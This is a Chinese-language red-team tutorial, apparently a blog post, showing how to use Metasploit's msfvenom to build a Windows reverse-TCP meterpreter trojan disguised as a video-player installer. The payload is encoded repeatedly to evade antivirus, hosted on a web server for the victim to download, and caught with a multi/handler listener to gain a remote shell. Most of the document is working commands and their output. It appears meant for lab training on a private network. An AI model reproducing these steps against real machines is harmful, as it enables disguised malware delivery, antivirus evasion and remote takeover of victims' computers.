红队/白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点!!!]

制作 windows 和 linux 客户端恶意软件进行渗透1.制作 Windows 恶意软件获取 shellmsfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机上执行,在本地监听上线。生成西瓜影音.exe 后门程序首先使用一个编码器代码语言:javascript代码运行次数:0运行复制┌──(root㉿kali-2024)-[/home/ljs/Desktop]

└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜影音 1.exe

Found 1 compatible encoders

Attempting to encode payload with 10 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 381 (iteration=0)

x86/shikata_ga_nai succeeded with size 408 (iteration=1)

x86/shikata_ga_nai succeeded with size 435 (iteration=2)

x86/shikata_ga_nai succeeded with size 462 (iteration=3)

x86/shikata_ga_nai succeeded with size 489 (iteration=4)

x86/shikata_ga_nai succeeded with size 516 (iteration=5)

x86/shikata_ga_nai succeeded with size 543 (iteration=6)

x86/shikata_ga_nai succeeded with size 570 (iteration=7)

x86/shikata_ga_nai succeeded with size 597 (iteration=8)

x86/shikata_ga_nai succeeded with size 624 (iteration=9)

x86/shikata_ga_nai chosen with final size 624

Payload size: 624 bytes

Final size of exe file: 73802 bytes

Saved as: /var/www/html/西瓜影音使用两个编码器组合编码代码语言:javascript代码运行次数:0运行复制┌──(root㉿kali-2024)-[/home/ljs/Desktop]

└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/西瓜影音 2.exe

Attempting to read payload from STDIN...

Found 1 compatible encoders

Attempting to encode payload with 20 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 381 (iteration=0)

x86/shikata_ga_nai succeeded with size 408 (iteration=1)

x86/shikata_ga_nai succeeded with size 435 (iteration=2)

x86/shikata_ga_nai succeeded with size 462 (iteration=3)

x86/shikata_ga_nai succeeded with size 489 (iteration=4)

x86/shikata_ga_nai succeeded with size 516 (iteration=5)

x86/shikata_ga_nai succeeded with size 543 (iteration=6)

x86/shikata_ga_nai succeeded with size 570 (iteration=7)

x86/shikata_ga_nai succeeded with size 597 (iteration=8)

x86/shikata_ga_nai succeeded with size 624 (iteration=9)

x86/shikata_ga_nai succeeded with size 651 (iteration=10)

x86/shikata_ga_nai succeeded with size 678 (iteration=11)

x86/shikata_ga_nai succeeded with size 705 (iteration=12)

x86/shikata_ga_nai succeeded with size 732 (iteration=13)

x86/shikata_ga_nai succeeded with size 759 (iteration=14)

x86/shikata_ga_nai succeeded with size 786 (iteration=15)

x86/shikata_ga_nai succeeded with size 813 (iteration=16)

x86/shikata_ga_nai succeeded with size 840 (iteration=17)

x86/shikata_ga_nai succeeded with size 867 (iteration=18)

x86/shikata_ga_nai succeeded with size 894 (iteration=19)

x86/shikata_ga_nai chosen with final size 894

Payload size: 894 bytes

Found 1 compatible encoders

Attempting to encode payload with 10 iterations of x86/alpha_upper

x86/alpha_upper succeeded with size 1857 (iteration=0)

x86/alpha_upper succeeded with size 3783 (iteration=1)

x86/alpha_upper succeeded with size 7635 (iteration=2)

x86/alpha_upper succeeded with size 15338 (iteration=3)

x86/alpha_upper succeeded with size 30745 (iteration=4)

x86/alpha_upper succeeded with size 61558 (iteration=5)

x86/alpha_upper succeeded with size 123185 (iteration=6)

x86/alpha_upper succeeded with size 246439 (iteration=7)

x86/alpha_upper succeeded with size 492946 (iteration=8)

x86/alpha_upper succeeded with size 985961 (iteration=9)

x86/alpha_upper chosen with final size 985961

Payload size: 985961 bytes

Final size of exe file: 1060864 bytes

Saved as: /var/www/html/西瓜影音参数详解: -a 指定架构如 x86 x64。 x86 代表 32 位, x64 代表 64 位。 32 位软件可以在 64 位系统上运行。所以我们生成 32 位的后门,这样在 32 位和 64 位系统中都可以使用。--platform 指定平台,这里选择 windows,通过 --l platforms 可以查看所有支持的平台-p 设置攻击载荷,我们使用 windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有攻击载荷LHOST 目标主机执行程序后连接我们 Kali 的地址LPORT 目标主机执行程序后连接我们 Kali 的端口-b 去掉坏字符,坏字符会影响 payload 正常执行。-e 指定编码器,也就是所谓的免杀,x86/shikata_ga_nai 是 msf 自带的编码器,可以通过 -lencoders 查看所有编码器-i 指定 payload 有效载荷编码迭代次数。 指定编码加密次数,为了让杀毒软件,更难查出源代码-f 指定生成格式,可以是 raw,exe,elf,jar,c 语言的,python 的,java 的......,用 -lformats 查看所有支持的格式-o 指定文件名称和导出位置。 指定到网站根目录/var/www/html,方便在肉机上下载后门程序扩展补充:\x00 代表 16 进制的“00”组成的字符串。通过 ASCII 码换成能识别的就是:"00" -"00000000" - NUL。由于"00000000"是不可见字符,所以代码中没用。如下图所示: 在 MSF 上启动 handler 开始监听后门程序代码语言:javascript代码运行次数:0运行复制msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.1.53

LHOST => 192.168.1.53

msf6 exploit(multi/handler) > set LPORT 4444

LPORT => 4444

msf6 exploit(multi/handler) > exploit在 Kali 上启动 apache 为后门程序提供下载地址Kali 上再打开一个终端,启动 apache,方便我们在 win7 上下载执行程序代码语言:javascript代码运行次数:0运行复制┌──(root㉿kali-2024)-[/home/ljs/Desktop]

└─# systemctl start apache2 #kali 自带 apache 服务器打开 win7 访问 Kali 搭建的 Web 服务下载执行文件

打开浏览器分别访问:http://192.168.1.53/西瓜影音 1.exe 和 http://192.168.1.53/西瓜影音2.exe接着在打开:在 MSF 终端查看建立的 sessionShell 中输入 ipconfig 查看 win7 主机的 IP 地址代码语言:javascript代码运行次数:0运行复制meterpreter > ipconfig查看当前目录下的内容有啥将会话保存到后台,方便以后使用代码语言:javascript代码运行次数:0运行复制meterpreter > background

msf6 exploit(multi/handler) > sessions #查看会话

msf6 exploit(multi/handler) > sessions -i 1 ·#指定会话 ID,调用新的会话

meterpreter > exit #如果不想使用了,就退出,断开会话查看拿到会话后可以执行哪些命令代码语言:javascript代码运行次数:0运行复制meterpreter > help